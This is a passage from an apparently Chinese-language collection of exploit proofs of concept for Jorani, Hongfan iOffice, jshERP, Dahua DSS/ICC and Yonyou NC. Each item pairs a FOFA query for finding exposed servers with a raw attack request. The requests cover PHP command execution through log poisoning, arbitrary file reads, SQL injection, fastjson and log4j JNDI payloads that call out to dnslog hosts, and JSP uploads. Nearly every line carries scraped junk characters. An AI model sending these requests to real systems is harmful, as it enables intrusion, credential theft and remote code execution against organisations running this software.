: }# E8 Q1 K' M0 b% F1 fCache-Control: no-cache
6 u% ~2 e- T. N/ u, }6 j4 Y( GUpgrade-Insecure-Requests: 1 a$ |' j# I6 [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
2 a; T& ~9 L7 }' c4 NAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7- c) o+ n6 [0 V/ m; h
Accept-Encoding: gzip, deflate
* g; V/ _1 F" S7 |" ~1 yAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
$ Z w" G6 f" d! b; E4 R) ?Connection: close
3 \4 z% p. Z& l( ^& u" h2 s4 I- y: d/ K2 l1 c+ j5 g
* y( S }, l' l5 h: V
12. Jorani < 1.0.2 远程命令执行
' b' |9 T6 x' E2 bFOFA:title="Jorani"
4 y" S) e$ w. g1 ~第一步先拿到cookie/ b$ r. m( o$ r$ H c0 A; V& u$ ~
GET /session/login HTTP/1.1
0 ~/ A4 o1 D+ j! q: b) {$ pHost: 192.168.190.30( m% | f& S [) }# ~
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
7 c# k8 O8 c3 g+ U0 ^2 {Connection: close
a; u+ p1 b. S9 D( |8 B, {4 gAccept-Encoding: gzip
2 W3 N+ C* T$ d8 m; v8 q3 B5 C% _- [8 V4 j+ ^& g5 Z# B
, y+ |% v* c" U; a+ u, A" p响应中csrf_cookie_jorani用于后续请求
: w+ A& c- a( D: pHTTP/1.1 200 OK
, e+ N9 o( I3 I% VConnection: close8 X& @% b5 R$ u" |9 Z
Cache-Control: no-store, no-cache, must-revalidate
4 Q7 B; ]1 m; P1 V9 zContent-Type: text/html; charset=UTF-8! C" v$ g# x8 \( l; a
Date: Tue, 24 Oct 2023 09:34:28 GMT
) L( a/ i) e D. c$ q. n1 N9 RExpires: Thu, 19 Nov 1981 08:52:00 GMT7 [& z7 H* x4 H- e7 C6 x/ S2 M& E
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT+ I5 M! k% F' |8 f/ g6 K+ O0 n0 S e1 q
Pragma: no-cache
+ U' M% X" [0 _! d( YServer: Apache/2.4.54 (Debian)( n* g# ?1 Q c9 {! D" _
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=// w2 O9 K- L6 z
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
/ M2 D- {( o; T4 s. EVary: Accept-Encoding7 C- q: G- {% _3 x7 S' q
. y6 k. R/ l; B% F+ x* D q+ G
) u9 s$ R+ F# g- k1 w1 APOST请求,执行函数并进行base64编码0 p9 \1 c+ C4 K. O0 L5 u8 w
POST /session/login HTTP/1.1
2 C9 @; z) L( X; N( B% fHost: 192.168.190.30
& u) l$ D( w+ cUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.363 D+ Y2 s) |! N V' N* ^
Connection: close3 m5 t, I8 ^) F, Q
Content-Length: 252
" E% n: s4 t2 J% ~5 b. iContent-Type: application/x-www-form-urlencoded
l- n; l. c+ M' YCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
, R1 G6 }9 D- f0 w1 x! dAccept-Encoding: gzip% @0 U( @ `& C& e+ P
8 H/ j4 ?0 Z! k4 y; U9 |
csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor' ~- g- A* e/ [4 K
2 R3 ?5 Q# B: q+ @" _: m
; s9 N3 H. u* e/ y1 J# \% c# Y# b) ]+ D7 }
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串: _5 T5 [' [$ Q
GET /pages/view/log-2023-10-24 HTTP/1.1
( i: q) U9 c; X& h1 q& D8 kHost: 192.168.190.30
! K+ L0 f! G! c a% nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.366 ^8 |5 S) K* G3 p0 J5 q' W
Connection: close1 M1 S1 H( a0 d3 t
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
5 `+ F$ w/ i8 O1 u, I6 NK1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=# c; o$ \' J! w: b
X-REQUESTED-WITH: XMLHttpRequest
5 o- D: y+ @/ \! I, F, RAccept-Encoding: gzip
! X8 Q5 z7 p/ `, k' w4 v/ a% S+ r( _* ~+ X5 y+ O8 ]4 P* a/ J
& s% S" C( P% `* n/ a
13. 红帆iOffice ioFileDown任意文件读取9 X! A# p; I+ e. a: o% O4 w# _. d# c
FOFA:app="红帆-ioffice"
. K6 u2 j6 h' v* @3 WGET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
/ q( E6 T' w% p& ?Host: x.x.x.x( A- L; g, M4 \/ b* w) d
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
8 \. l0 O3 n( _5 F3 a% U) LConnection: close; Q$ ~" q8 P @0 |. `, G1 M4 e
Accept: */*
; e% j# @$ K y. A4 F0 `7 M$ TAccept-Encoding: gzip* ~2 m" K$ ~! n7 \2 M1 R
1 C' h v+ l1 c) p
4 ~ \% e7 h" W/ n% H: ~) N14. 华夏ERP(jshERP)敏感信息泄露5 k) \) H0 ~) M" o( X
FOFA:body="jshERP-boot": V5 F4 s5 R# @, h
泄露内容包括用户名密码% w* m- V5 _: T! y x8 X
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1) p/ ^ Q! V. Z- T
Host: x.x.x.x; b7 P# `0 K! u0 s
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
8 K7 B+ ?! m" P, {% G3 w5 {1 D5 h5 oConnection: close& d. v. K8 U, N! m; {
Accept: */*
/ b2 d; ^( S% F, v V% R* `: QAccept-Language: en0 Q9 t0 [ U+ N
Accept-Encoding: gzip
; b) w7 b! H& ^! ~2 _$ [- j, P
# Y* ] C d! l* O- j& S f5 i. y7 {9 @0 Z* X* C+ J
15. 华夏ERP getAllList信息泄露
- e9 r" P. ^3 E( T ?% c2 {CVE-2024-04901 q4 a9 V1 X7 e$ i9 b
FOFA:body="jshERP-boot"
! h* }" b& P. x& p* j' P' Z$ W. R泄露内容包括用户名密码
: q. P3 z6 s5 j9 OGET /jshERP-boot/user/a.ico/../getAllList HTTP/1.19 E; H- ~/ e1 L
Host: 192.168.40.130:100
; S, i, Z4 M2 PUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36; R& j0 Z! R* H. P
Connection: close3 T; Y# }1 M( e) h
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
( u. m# M4 S0 ?! u9 ?Accept-Language: en
+ b3 w& o0 Q7 ?% X- l: |sec-ch-ua-platform: Windows
- |6 N' m b( X& I- Q7 YAccept-Encoding: gzip
/ b$ n$ Q: c. |: ]# N( g6 T2 _& \; R5 k, f, y. m
; Z. U+ C1 S7 Y% O6 x. O6 ]" Y16. 红帆HFOffice医微云SQL注入
4 G! }( B4 w( N) B, n, l6 BFOFA:title="HFOffice"
( @4 N( _0 K$ O; G5 y- w( Wpoc中调用函数计算1234的md5值4 v5 H! O: S; j( P- E+ B, A
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
1 Y, O( P# a& LHost: x.x.x.x
& }4 a5 S% {) t; U% wUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36 [# [- \& h, I/ h
Connection: close
9 J% H3 p+ W4 |; aAccept: */*
7 P0 P& A7 Q* v) T1 p; q; i& @Accept-Language: en
8 P. Y; C5 Q$ z1 `% bAccept-Encoding: gzip
, j4 h2 w' v0 j( v3 `
3 y& i7 Y, i; }( P6 G6 m$ ~2 p( _
; R1 K; b8 m) {/ F17. 大华 DSS itcBulletin SQL 注入
: {* m0 @7 s4 a0 g- @FOFA:app="dahua-DSS"
$ r5 H6 X% M. M( s' EPOST /portal/services/itcBulletin?wsdl HTTP/1.19 x# I u( |! [ `" L$ p3 D, l2 y
Host: x.x.x.x3 B d* A/ U+ `8 z; _3 e
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.152 x: N$ s0 I, v. g5 \! J2 w
Connection: close7 t1 Q/ `; ~& I# Z r. k
Content-Length: 345* G9 E: m- P$ v- `& Y" `
Accept-Encoding: gzip
: c. l# |3 U& V. `( K; K' K m; S% J+ l: Y& |. h
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>9 A! r% b5 d: u- P9 w. R9 l. X8 }% a
<s11:Body>' G6 C* Z# g, a. C6 w/ }
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
; ~$ ?3 J8 O4 P- y <netMarkings>( g& G w- R+ C6 U* _3 F. L
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
; b7 W- s+ W% {/ q </netMarkings>
/ i6 }' i L. Y( k) N6 U* [1 f9 \/ o </ns1:deleteBulletin>
/ X" G' I+ p& q2 C) Z! T </s11:Body>/ e1 S& ~% @2 B- a9 F
</s11:Envelope>
; n. d2 K# m' I* U7 `9 ?" M( a
% }6 a9 Q: l( N. p5 H4 Y
$ U2 M$ _$ W9 }% n- m5 z' h18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
' j7 |- g6 j' r% K3 S7 \! jFOFA:app="dahua-DSS"
: G& h6 ]( c6 m; \/ I: d! W6 q" mGET /admin/cascade_/user_edit.action?id=1 HTTP/1.1+ @- E, L% F( b3 w
Host: your-ip
( U5 X5 r* S& u2 ]. a& n3 p( PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 z ]) Q8 Q1 t7 _8 g `0 T a
Accept-Encoding: gzip, deflate
P7 g+ n3 R5 ~; L: Q+ y5 K N* N$ dAccept: */*: z1 {' E! ~7 F. B5 g
Connection: keep-alive$ c* [! |( q4 v5 K5 m0 C1 x- ]! b0 D2 v
1 _; V& \: U2 k4 W( s/ L
3 C6 t3 I: E# a0 Z6 h
# y F( x8 n' b0 K# } B; p" O# F19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入) o. F, ]6 N: k% p# t9 _2 N
FOFA:app="dahua-DSS"
. ~0 N6 m) t# C0 g& k0 d" m3 [: oGET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
# Z# N9 j O! n( {7 Q% fHost:9 k3 V4 v" v+ Z; A9 u6 s$ ]; I
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36% \5 d3 d t% Z1 K+ W
Accept-Encoding: gzip, deflate( R; F2 R' T& T) X* g
Accept: */*7 T$ l7 P) i8 a% |2 ^% B
Connection: keep-alive
( g [: [; Q; h, e' c5 n4 m6 U. R$ A. @3 r7 J
' c: ^8 O; U- U" V2 d' Z- |
20. 大华ICC智能物联综合管理平台任意文件读取) F$ y8 r( U, l7 W
FOFA:body="*客户端会小于800*"
% B, [( R% _( E0 n' CGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1 M. C _6 r' l `$ u! G
Host: x.x.x.x
1 r: k6 J; N4 o3 P# z$ W- ZUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
2 s# M# o% A2 Y1 HConnection: close# i7 j( V# n6 c% X1 [) S) [
Accept: */*+ W- {3 _9 k3 I' |: [
Accept-Language: en' c' p/ ^2 I+ k" U
Accept-Encoding: gzip& a8 o0 u( I. a* Y( e
: U( I5 I8 Y/ A3 k1 \/ [ \/ B
4 r0 O5 O/ Z9 M9 S* p6 O5 u$ u21. 大华ICC智能物联综合管理平台random远程代码执行
& l+ \' C9 ?6 [; i/ g5 s/ b* SFOFA:icon_hash="-1935899595"
2 [) z# J# Z7 U- h6 z. xPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
* H9 `- u% v- t+ f0 E6 L2 O0 iHost: x.x.x.x" K2 Q; A, D+ `
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
" G' t% n' f7 ZContent-Length: 161& _: h T' S/ O: e# x& h0 c
Accept-Encoding: gzip7 |3 {( ?2 e' ~* ?
Connection: close
5 x" W# Z3 w( p( h2 ?1 |Content-Type: application/json;charset=utf-8' n# q- z5 D9 _4 ]6 L
1 D4 o! V! P2 f! H* u3 P) R{
6 y9 f R7 i& |8 Q8 k6 \"a":{
1 M8 ]: l( X# a- q, i W# K "@type":"com.alibaba.fastjson.JSONObject",
! l r4 Q" C% U' T/ @ { {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}/ q) H* z; B" h; {
}""
- [) k$ c0 \7 w0 G: d}
4 [. D# [9 x, @/ C5 R% w- n( P4 e ^( }0 i7 l% ?
6 z5 g9 H: h& }0 K- m' W6 S22. 大华ICC智能物联综合管理平台 log4j远程代码执行
/ }8 D3 z5 ? D7 z oFOFA:icon_hash="-1935899595"
, X6 c" E7 h, L# v- W) ~0 TPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
9 B1 s! U" P# \& H4 M1 p1 y5 g) tHost: your-ip
) K$ t2 E) M d( S% kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.366 D; L7 f: k) g$ a5 k
Content-Type: application/json;charset=utf-8" [! w- |2 J& }
- [6 `- N: ^2 t( R" Y
{
6 e1 l" u; P: x+ C6 J"loginName":"${jndi:ldap://dnslog}" Q! z- `4 e+ }$ D9 |% F# p/ G
}
" s1 N: A6 R7 c" \: O: L
/ P- s ?% H0 p* l) F; c4 N! E5 p$ p! v
8 f% r7 e& Y: x2 k$ u
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行0 Z0 @! y( x% h( Q2 s
FOFA:icon_hash="-1935899595"
6 d( L5 b3 m. b) u. j4 O+ @POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.12 L5 I; ^3 U& w
Host: your-ip G% n6 \, n0 I9 F, w3 i) ~, G
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
5 Q: c" p7 E7 z! X6 AContent-Type: application/json;charset=utf-8( q% D+ O$ o% h/ I+ B- L9 o# J
Accept-Encoding: gzip
2 r- w! y) h- S* ~Connection: close% L7 `, ^8 I& F- F0 k
: U, |8 J& |; @8 Z
{$ T. p6 L. v" U7 {2 z% y
"a":{
# L$ b: `) g( `" q% Y2 E k/ B# Y3 O "@type":"com.alibaba.fastjson.JSONObject",( o4 K9 u: l" Z( Y) Q6 x
{"@type":"java.net.URL","val":"http://DNSLOG"}, U$ {! d6 i) H& z( {4 x
}""
! ~' w# Y* g2 b$ c$ @1 ^4 r}
5 ]; Z' S' H5 M- q, B- v
4 \ b, P# E/ ^6 x3 t8 E/ }' E0 c$ Y# ~+ g# t. v( L6 P
24. 用友NC 6.5 accept.jsp任意文件上传2 E- n8 `6 d- o) @/ H
FOFA:icon_hash="1085941792"* O0 I/ w# @, i& |* S
POST /aim/equipmap/accept.jsp HTTP/1.1
& F! H; J7 n, L ^3 J9 @" KHost: x.x.x.x4 k( m _1 i) M
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
: Y' t; i0 f' JConnection: close( g" Q$ K" h; `' n) U
Content-Length: 449/ T2 w) o" L2 [# M" m( l
Accept: */*% m5 Y' \0 i% u6 ^. V
Accept-Encoding: gzip" f% o9 o# K5 d/ X8 I
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc7 N; M7 d: l3 c1 w7 J9 g
0 z6 ]5 J o8 x* I-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc4 ^/ M6 S9 B# n: }( G+ P- c. P" | o! M
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
4 E/ a, y3 h9 c8 |Content-Type: text/plain6 F) L) ^9 P4 w" l# I' `
5 s4 `$ Z, y7 T: c+ M<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>$ ^" J7 m- P2 a2 E! j
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
% e! p }- F! q$ K% _( UContent-Disposition: form-data; name="fname"
# G- \" j2 Y2 b% }7 ?9 z6 F) |
\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp4 e9 I9 J) E+ i1 ]7 c+ L, O' c7 |! M1 t
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--" C, t7 [6 d& `/ c
' g! d; \( M4 o9 K$ |2 }3 p
) H* d$ l$ ?5 Y25. 用友NC registerServlet JNDI 远程代码执行
( {) S# m8 h2 p5 [ Z6 ?; H+ cFOFA:app="用友-UFIDA-NC"; e. {9 C2 ~* }' \, [8 Z
POST /portal/registerServlet HTTP/1.1
. ? M" X1 v5 j" yHost: your-ip: { b/ G& J* _/ _, C- S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
( d y- V: m- J6 F% z3 iAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9' S+ }9 m; R7 C+ T5 ^% d: j* ]5 v
Accept-Encoding: gzip, deflate
2 [5 _+ ^1 @* j2 _0 EAccept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.60 O3 ?+ P( m$ {- P8 T6 V+ `
Content-Type: application/x-www-form-urlencoded
5 i1 I: Q/ [7 V0 p4 O! A6 }& x+ y0 @
type=1&dsname=ldap://dnslog# h' ? o! q. N- I3 {- f
3 m8 H$ j+ g2 z9 ~
0 S# d, R* M, I! k4 w
3 a3 h- U, M7 t9 I" Z$ @" H
26. 用友NC linkVoucher SQL注入$ x- M$ u! v/ S Y, ?! `0 y) T
FOFA:app="用友-UFIDA-NC"
$ l1 N- h) p Q5 yGET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
5 i5 ^% D- _- ~Host: your-ip
+ Z! Y) a) l6 r$ c: @0 O4 pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+ Q6 s0 ] A2 |* G0 ~Content-Type: application/x-www-form-urlencoded, G6 H( j/ z; C$ }6 C* P
Accept-Encoding: gzip, deflate( A# s, n! Z# ^! I. p6 }# n( W
Accept: */** G- V K% s. J1 R7 a
Connection: keep-alive
0 c+ Y3 U, `) }+ M/ ^. ]6 c; c5 K% u" |3 l) Z' H7 f0 {& d2 m6 X
$ c; Q, l4 a0 j% D$ T' E# [. x27. 用友 NC showcontent SQL注入1 z6 u9 J9 R" i' l( f6 o+ J$ f0 v5 {
FOFA:icon_hash="1085941792"3 h7 x& T, T$ o/ s0 x2 R9 \
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
0 j! ~; e0 ~1 L9 L/ lHost: your-ip3 h" f1 e! H$ k z% \+ V. \5 m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.369 P$ h7 W, ]* a. m* w6 l+ Q. F% R
Accept-Encoding: identity( k$ ?% S! F) R9 i2 Y
Connection: close
- p1 W% K* f; N+ L1 rContent-Type: text/xml; charset=utf-8
% L- A1 I1 f& O. V! ]! R; p. i a M1 |2 X; W% F
9 | N; C# G0 f& k, X1 D5 n) K1 F! G
28. 用友NC grouptemplet 任意文件上传
3 L, U2 K& s8 N& O$ }6 xFOFA:icon_hash="1085941792"* D3 q9 K7 q. Z' F
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
) c6 p+ a7 e Y) n7 t- D5 C6 ZHost: x.x.x.x
3 J6 n! x( a9 r* r( @0 PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36. _$ w! ~+ }) s7 `8 I5 W# I
Connection: close/ I. _. j4 p3 y3 x N, e/ J, m
Content-Length: 268' I: l9 u7 n) P; z' R* O; K9 a! H7 U6 X
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk O9 E# h/ T! m( c( S
Accept-Encoding: gzip
0 ?8 ^( J1 @+ R) R6 \4 Q& Y6 I+ K' u$ |: d1 a+ a4 d# t
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk: ]5 ^( x* d2 _
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
3 j- ^8 S1 y& u* J6 Y$ }Content-Type: application/octet-stream. l$ g' Z6 v' g6 _# |' ?0 O
" ~) ?, P1 \" ]- K) L {/ j. _, N<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>6 r4 |8 |/ x4 S" ]& Q, R! N" }, _
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--9 S+ u4 J# |; f$ x! _6 r2 z
5 P' U6 L9 I: h0 m' M& z. y' q. O; \' s
/uapim/static/pages/nc/head.jsp
! R" [3 [) { J0 b! D5 ^3 g( j1 s C0 E. R) l0 \7 B( H
29. 用友NC down/bill SQL注入$ p6 X1 w# B1 R8 }0 r9 z
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"; n1 y2 f( A- }: v
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
, c6 M5 ^ y; v. c* Z* xHost: your-ip( q' b3 I$ b( u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
) U: ^# P1 b8 |0 D( f. u8 BContent-Type: application/x-www-form-urlencoded& [8 L" |& o! m8 }& F2 D) ]1 T/ N; Y
Accept-Encoding: gzip, deflate
6 {, }" I3 A k9 B& @7 i0 O1 _Accept: */*
u2 ]; ]* Q) qConnection: keep-alive
( u1 m* e- f; V# G4 n1 \# h
3 [9 z D6 A, W6 o7 {: R2 u( d8 ? i, P7 C
30. 用友NC importPml SQL注入
b0 l, x# F9 {+ Q. ~# F* mFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"7 o1 f- X4 u4 \: h7 R# @0 E: u
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
6 H; l* T* S# D1 nHost: your-ip
1 d4 e+ i9 k# Y3 A6 V, q$ x& L" NContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
' }# ~% G8 G7 zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
9 @7 T+ k( q ]. i: M9 q/ E2 ~, BConnection: close
( r# Q. g' I& M- S- [& }" M" E: p2 D" F
------WebKitFormBoundaryH970hbttBhoCyj9V; ~7 G: s& Q- _, I" l
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
g$ u" v6 o! F# [& t6 W" rContent-Type: image/jpeg
' n2 ^4 D0 _! m+ s) V------WebKitFormBoundaryH970hbttBhoCyj9V--
5 b. ~" M" Z% K; f# W* E3 i
& _& t: q6 N9 u: V2 P1 e; ^/ \/ c
& m# H3 X" X0 X31. 用友NC runStateServlet SQL注入1 R, `: Z0 P0 a- e+ Q1 Q+ I
version<=6.56 C4 r- Z& v% n2 {
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif") ]7 ]6 y2 v1 t# p; D
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
+ \, B5 f) f: V6 AHost: host; z5 p7 F6 {. m! i0 u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36: g$ _8 k4 m7 @# _1 x# U
Content-Type: application/x-www-form-urlencoded
, B$ @( I" Z6 q! C% ^5 n$ r t* H0 |- a# j- {* {. K& u! A& r; a
; ` v* p' l# N32. 用友NC complainbilldetail SQL注入, z6 _: v* r* g
version= NC633、NC65
5 o' V" G& U0 ?7 \3 Z* Y" \FOFA:app="用友-UFIDA-NC"( x5 V% l$ _6 d6 E6 |
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1( Q1 x- |3 f; B- h K
Host: your-ip
0 ]8 T$ U0 g" o4 C9 S( _3 ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.360 X e! e% i1 ]& b7 Z6 Z
Content-Type: application/x-www-form-urlencoded) v3 \3 ?% G! X; x, L
Accept-Encoding: gzip, deflate
: m$ A& z2 P) z& \Accept: */*& C5 \ U3 t" G9 ]2 W& ?" v" J
Connection: keep-alive
* `7 r- `# l" \
" p- a \' y- o+ Q4 F
' ]! A- B, h) _. M& p33. 用友NC downTax/download SQL注入
4 }0 | P/ A$ ~% I9 jversion:NC6.5FOFA:app="用友-UFIDA-NC": m' P! }/ g8 z* V0 E
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
6 i7 L% |" N4 d e2 t$ ~( i; I. SHost: your-ip; ?5 c9 Y7 P1 ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
5 R' c# p# ^; E3 Y2 }& jContent-Type: application/x-www-form-urlencoded: p1 c5 [# Z4 d4 f: i l2 h2 Z
Accept-Encoding: gzip, deflate
0 { K. {% a! R0 D/ k; h: a# VAccept: */*+ ], B) Z) W* J: r# c
Connection: keep-alive
( z- a' l0 `( A+ a+ w( r3 x% R5 u5 ]8 P/ d4 u; l- g
: q S' J4 v5 G1 _# S34. 用友NC warningDetailInfo接口SQL注入2 n8 q! ], J1 `3 h6 }; K& R& G
FOFA:app="用友-UFIDA-NC"8 [' S7 W; T( r2 B% I- \' t9 L
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
" W0 ^. R% m; v& q& R! M5 LHost: your-ip8 A T) J( P* `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
: ?$ N7 {# }0 Q" Q5 n" a* s/ e) @Content-Type: application/x-www-form-urlencoded
/ M9 `% y9 H/ E( ]Accept-Encoding: gzip, deflate% J) a$ p% T4 @! f3 o" \
Accept: */*8 q. j: h% h/ p1 f# ~; t5 g( |
Connection: keep-alive; j% ?; N' P; c1 Q, {; \
$ y& y! A: l- ?' H
0 | `5 p& L8 {35. 用友NC-Cloud importhttpscer任意文件上传
; m; m# k5 G) k6 S( JFOFA:app="用友-NC-Cloud"
